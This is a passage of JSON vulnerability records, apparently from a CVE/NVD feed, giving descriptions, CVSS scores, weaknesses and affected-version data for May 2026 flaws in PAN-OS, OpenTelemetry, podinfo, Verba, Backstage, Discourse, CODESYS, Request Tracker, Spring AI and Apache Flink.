,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:h4:*:*:*:*:*:*","matchCriteriaId":"396DC378-7716-40F6-88A4-99299A16CAF1"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:h7:*:*:*:*:*:*","matchCriteriaId":"5E5C6E3A-262C-4212-B21C-00E8079AA8CF"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:h8:*:*:*:*:*:*","matchCriteriaId":"4C855108-D3C9-4DE3-B9F4-9735A0A439AF"}]}]}],"references":[{"url":"https://security.paloaltonetworks.com/CVE-2026-0257","source":"psirt@paloaltonetworks.com","tags":["Vendor Advisory"]},{"url":"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-0257","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","tags":["US Government Resource"]}]}},{"cve":{"id":"CVE-2026-42602","sourceIdentifier":"security-advisories@github.com","published":"2026-05-13T21:16:47.210","lastModified":"2026-06-01T13:47:32.807","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"azureauthextension is the Azure Authenticator Extension. From 0.124.0 to 0.150.0, a server-side authentication bypass in azureauthextension allows any party who holds a single valid Azure access token for any scope the collector's configured identity can mint for to authenticate to any OpenTelemetry receiver that uses auth: azure_auth. The extension's Authenticate method does not validate incoming bearer tokens as JWTs. Instead, it calls its own configured credential to obtain an access token and compares the client's token to the result with string equality — and the scope for that server-side token request is taken from the client-supplied Host header. As a result, a token minted for any Azure resource the service principal has ever been issued a token for (ARM, Graph, Key Vault, Storage, etc.) will authenticate to the collector if the attacker picks a matching Host. 
Tokens are replayable for the full issued lifetime (commonly several hours for managed identity tokens)."}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H","baseScore":8.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":5.2}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-208"},{"lang":"en","value":"CWE-287"},{"lang":"en","value":"CWE-290"},{"lang":"en","value":"CWE-294"},{"lang":"en","value":"CWE-347"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:opentelemetry:opentelemetry_collector_contrib:*:*:*:*:*:go:*:*","versionStartIncluding":"0.124.0","versionEndIncluding":"0.150.0","matchCriteriaId":"DAF35C18-82FD-4D93-8424-E59866D90769"}]}]}],"references":[{"url":"https://github.com/open-telemetry/opentelemetry-collector-contrib/security/advisories/GHSA-pjv4-3c63-699f","source":"security-advisories@github.com","tags":["Exploit","Mitigation","Vendor Advisory"]},{"url":"https://github.com/open-telemetry/opentelemetry-collector-contrib/security/advisories/GHSA-pjv4-3c63-699f","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","tags":["Exploit","Mitigation","Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-43644","sourceIdentifier":"disclosure@vulncheck.com","published":"2026-05-14T13:16:18.770","lastModified":"2026-06-01T13:48:57.850","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"podinfo through 6.11.2 contains a reflected cross-site scripting vulnerability in the /echo and /api/echo endpoints where the echoHandler writes request body content directly to the response 
without setting explicit Content-Type or X-Content-Type-Options headers. Attackers can craft cross-origin HTML pages with auto-submitting forms containing script payloads in the request body, which are served as text/html due to Go's content type detection, allowing the reflected script to execute in the podinfo origin context when victims visit the attacker's page."}],"metrics":{"cvssMetricV40":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":5.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"ACTIVE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"LOW","subIntegrityImpact":"LOW","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R
/S:U/C:L/I:L/A:N","baseScore":5.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.5},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7}]},"weaknesses":[{"source":"disclosure@vulncheck.com","type":"Primary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:stefanprodan:podinfo:*:*:*:*:*:kubernetes:*:*","versionEndIncluding":"6.11.12","matchCriteriaId":"27CA7FB3-D2D7-4E97-819F-2A044609E990"}]}]}],"references":[{"url":"https://github.com/Niccolo10/Security-Advisories/blob/main/CVE-2026-43644/cve-2026-43644.md","source":"disclosure@vulncheck.com","tags":["Exploit","Mitigation","Third Party Advisory"]},{"url":"https://github.com/stefanprodan/podinfo/issues/474","source":"disclosure@vulncheck.com","tags":["Issue Tracking"]},{"url":"https://www.vulncheck.com/advisories/podinfo-reflected-xss-via-echo-endpoint","source":"disclosure@vulncheck.com","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2026-21730","sourceIdentifier":"cvd@cert.pl","published":"2026-05-14T15:16:44.577","lastModified":"2026-06-01T13:51:17.240","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Verba is affected by a Stored Cross-Site Scripting (XSS) vulnerability within its login logging mechanism. 
When an unauthenticated remote attacker attempts to log in using an incorrect username and password combination, the supplied username value is recorded in the application logs. Due to lack of input sanitization, an attacker can inject a malicious XSS payload into the username field.\nThis payload will be executed in the context of the administrator’s browser when the admin accesses the web application's log viewer.\n\nThe vendor was notified early about this vulnerability, but didn't respond to our messages. This issue was fixed in version 10.0.6"}],"metrics":{"cvssMetricV40":[{"source":"cvd@cert.pl","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"PASSIVE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"LOW","subIntegrityImpact":"LOW","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","provid
erUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7}]},"weaknesses":[{"source":"cvd@cert.pl","type":"Primary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:verint:verba_collaboration_compliance_and_quality_management_platform:*:*:*:*:*:*:*:*","versionEndExcluding":"10.0.6","matchCriteriaId":"C8BC74B1-9908-4233-AF5E-5C13301970E5"}]}]}],"references":[{"url":"https://cert.pl/en/posts/2026/05/CVE-2026-21730","source":"cvd@cert.pl","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2026-44374","sourceIdentifier":"security-advisories@github.com","published":"2026-05-14T15:16:48.250","lastModified":"2026-06-01T13:36:21.143","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Backstage is an open framework for building developer portals. Prior to 0.6.11, the unprocessed entities read endpoints in @backstage/plugin-catalog-backend-module-unprocessed do not enforce permission authorization checks. Any authenticated user can access unprocessed entity records regardless of ownership. This is an information disclosure vulnerability affecting Backstage installations using this module. 
This is patched in @backstage/plugin-catalog-backend-module-unprocessed version 0.6.11, @backstage/plugin-catalog-unprocessed-entities-common version 0.0.15 and @backstage/plugin-catalog-unprocessed-entities version 0.2.30."}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N","baseScore":4.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":1.4}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-863"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:linuxfoundation:backstage\\/plugin-catalog-backend-module-unprocessed:*:*:*:*:*:node.js:*:*","versionEndExcluding":"0.6.11","matchCriteriaId":"109B2D64-CFBC-4239-AF3A-1BF91F63B6F5"},{"vulnerable":true,"criteria":"cpe:2.3:a:linuxfoundation:backstage\\/plugin-catalog-unprocessed-entities:*:*:*:*:*:node.js:*:*","versionEndExcluding":"0.2.30","matchCriteriaId":"62811CDB-F9EE-48A5-BE85-0A298D696634"},{"vulnerable":true,"criteria":"cpe:2.3:a:linuxfoundation:backstage\\/plugin-catalog-unprocessed-entities-common:*:*:*:*:*:node.js:*:*","versionEndExcluding":"0.0.15","matchCriteriaId":"D2969930-3D83-4C7F-9B4D-AC193282F7E3"}]}]}],"references":[{"url":"https://github.com/backstage/backstage/security/advisories/GHSA-p7g9-rp3g-mgfg","source":"security-advisories@github.com","tags":["Vendor Advisory","Mitigation"]}]}},{"cve":{"id":"CVE-2026-32244","sourceIdentifier":"security-advisories@github.com","published":"2026-05-19T00:16:37.100","lastModified":"2026-06-01T13:57:19.007","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Discourse 
is an open-source discussion platform. In versions prior to 2026.1.4, 2026.3.1, 2026.4.1 and 2026.5.0-latest.1, outdated cached AI summaries can leak removed content to anonymous and unprivileged users who cannot regenerate summaries. This issue has been fixed in versions 2026.1.4, 2026.3.1, 2026.4.1 and 2026.5.0-latest.1. To work around this issue, restrict summary generation by tightening the allowed groups on the summarization Personas."}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":1.4}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-200"},{"lang":"en","value":"CWE-524"},{"lang":"en","value":"CWE-672"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"NVD-CWE-noinfo"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:discourse:discourse:*:*:*:*:latest:*:*:*","versionStartIncluding":"2026.1.0","versionEndExcluding":"2026.1.4","matchCriteriaId":"8859700A-C256-49F8-A921-933CF3A66517"},{"vulnerable":true,"criteria":"cpe:2.3:a:discourse:discourse:*:*:*:*:latest:*:*:*","versionStartIncluding":"2026.3.0","versionEndExcluding":"2026.3.1","matchCriteriaId":"CA619035-F6AF-4501-B331-AE685DE74BCA"},{"vulnerable":true,"criteria":"cpe:2.3:a:discourse:discourse:*:*:*:*:latest:*:*:*","versionStartIncluding":"2026.4.0","versionEndExcluding":"2026.4.1","matchCriteriaId":"09919919-C8A3-4AA6-AF85-45BD0FCA93F6"},{"vulnerable":true,"criteria":"cpe:2.3:a:discourse:discourse:2026.5.0:*:*:*:latest:*:*:*","mat
chCriteriaId":"8AD4BB38-1D03-4ECD-BFAB-900D57689A31"}]}]}],"references":[{"url":"https://github.com/discourse/discourse/security/advisories/GHSA-hjmg-2mww-vfvx","source":"security-advisories@github.com","tags":["Mitigation","Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-33514","sourceIdentifier":"security-advisories@github.com","published":"2026-05-19T02:16:16.210","lastModified":"2026-06-01T14:00:01.853","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Discourse is an open-source discussion platform. In versions prior to 2026.1.4, 2026.3.1, 2026.4.1 and 2026.5.0-latest.1, an authenticated user on a Discourse instance with the form templates feature enabled can read the name and structured content of form templates that are intended exclusively for categories they are not authorized to access. Impact is limited to disclosure of site configuration metadata. This issue has been fixed in versions 2026.1.4, 2026.3.1, 2026.4.1 and 2026.5.0-latest.1."}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":6.0,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction"
:"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N","baseScore":4.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":1.4}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-862"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:discourse:discourse:*:*:*:*:latest:*:*:*","versionStartIncluding":"2026.1.0","versionEndExcluding":"2026.1.4","matchCriteriaId":"8859700A-C256-49F8-A921-933CF3A66517"},{"vulnerable":true,"criteria":"cpe:2.3:a:discourse:discourse:*:*:*:*:latest:*:*:*","versionStartIncluding":"2026.3.0","versionEndExcluding":"2026.3.1","matchCriteriaId":"CA619035-F6AF-4501-B331-AE685DE74BCA"},{"vulnerable":true,"criteria":"cpe:2.3:a:discourse:discourse:*:*:*:*:latest:*:*:*","versionStartIncluding":"2026.4.0","versionEndExcluding":"2026.4.1","matchCriteriaId":"09919919-C8A3-4AA6-AF85-45BD0FCA93F6"},{"vulnerable":true,"criteria":"cpe:2.3:a:discourse:discourse:2026.5.0:*:*:*:latest:*:*:*","matchCriteriaId":"8AD4BB38-1D03-4ECD-BFAB-900D57689A31"}]}]}],"references":[{"url":"https://github.com/discourse/discourse/commit/ae5c9570fb918442c4d96abc83c1e7e16990
9b02","source":"security-advisories@github.com","tags":["Patch"]},{"url":"https://github.com/discourse/discourse/security/advisories/GHSA-w6g7-p2p9-2m5h","source":"security-advisories@github.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-0393","sourceIdentifier":"info@cert.vde.com","published":"2026-05-21T12:16:19.810","lastModified":"2026-06-01T14:01:00.860","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"The affected product may expose credentials remotely between low privileged visualization users during concurrent login operations due to insufficient isolation of authentication data. The vulnerability affects only login operations within an active visualization session."}],"metrics":{"cvssMetricV40":[{"source":"info@cert.vde.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":6.9,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"PASSIVE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImp
act":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":3.6}]},"weaknesses":[{"source":"info@cert.vde.com","type":"Primary","description":[{"lang":"en","value":"CWE-522"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:codesys:visualization:*:*:*:*:*:*:*:*","versionStartIncluding":"1.0.0.0","versionEndExcluding":"4.10.0.0","matchCriteriaId":"2500F865-A86C-4FA7-852F-8663004A8894"}]}]}],"references":[{"url":"https://codesys.csaf-tp.certvde.com/.well-known/csaf/white/2026/advisory2026-07_vde-2026-052.json","source":"info@cert.vde.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-6841","sourceIdentifier":"cvd@cert.pl","published":"2026-05-21T13:16:20.273","lastModified":"2026-06-01T14:02:21.180","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Request Tracker is vulnerable to a reflected cross-site scripting (XSS) vulnerability via the \"Page\" parameter in GET requests. 
An attacker can craft a URL that, when opened, results in arbitrary JavaScript execution in the victim’s browser.\n\nThis vulnerability affects versions from 5.0.4 up to 5.0.9 and from 6.0.0 up to 6.0.2."}],"metrics":{"cvssMetricV40":[{"source":"cvd@cert.pl","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":5.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"ACTIVE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"LOW","subIntegrityImpact":"LOW","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confiden
tialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7}]},"weaknesses":[{"source":"cvd@cert.pl","type":"Primary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:bestpractical:request_tracker:*:*:*:*:*:*:*:*","versionStartIncluding":"5.0.4","versionEndExcluding":"5.0.10","matchCriteriaId":"B391CF4D-CACE-4C0D-8717-2D3E73AFF79C"},{"vulnerable":true,"criteria":"cpe:2.3:a:bestpractical:request_tracker:*:*:*:*:*:*:*:*","versionStartIncluding":"6.0.0","versionEndExcluding":"6.0.3","matchCriteriaId":"C106711D-0178-4681-BA2F-081792A36275"}]}]}],"references":[{"url":"https://cert.pl/en/posts/2026/05/CVE-2026-6841","source":"cvd@cert.pl","tags":["Third Party Advisory"]},{"url":"https://docs.bestpractical.com/release-notes/rt/5.0.10","source":"cvd@cert.pl","tags":["Release Notes"]},{"url":"https://docs.bestpractical.com/release-notes/rt/6.0.3","source":"cvd@cert.pl","tags":["Release Notes"]},{"url":"https://requesttracker.com/request-tracker/","source":"cvd@cert.pl","tags":["Product"]}]}},{"cve":{"id":"CVE-2026-41863","sourceIdentifier":"security@vmware.com","published":"2026-05-25T07:16:16.377","lastModified":"2026-06-01T14:22:15.893","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Spring AI's support for Anthropic's Skills API used LLM-influenced filenames unsanitized in Path.resolve before writing files to disk. 
This could allow a malicious user to write files outside the intended target directory, including restricted directories.\n\nAffected versions:\nSpring AI: 1.1.0 through 1.1.x"}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":3.6}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-22"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_ai:*:*:*:*:*:*:*:*","versionStartIncluding":"1.1.0","versionEndExcluding":"1.1.7","matchCriteriaId":"79B32FFF-1F8A-4904-BFC7-C41C07FFC575"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41863","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-40564","sourceIdentifier":"security@apache.org","published":"2026-05-26T16:16:24.590","lastModified":"2026-06-01T14:08:31.437","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Files or Directories Accessible to External Parties, Server-Side Request Forgery (SSRF) vulnerability in Apache Flink Kubernetes Operator.\n\nThe FlinkSessionJob jarURI is currently not validated so that it points to user-owned files or addresses.  This lets a user with CR create permissions read files from the operator pod's filesystem and pull content from any backing store reachable through Flink's pluggable filesystem layer and access them through the submitted Flink job. 
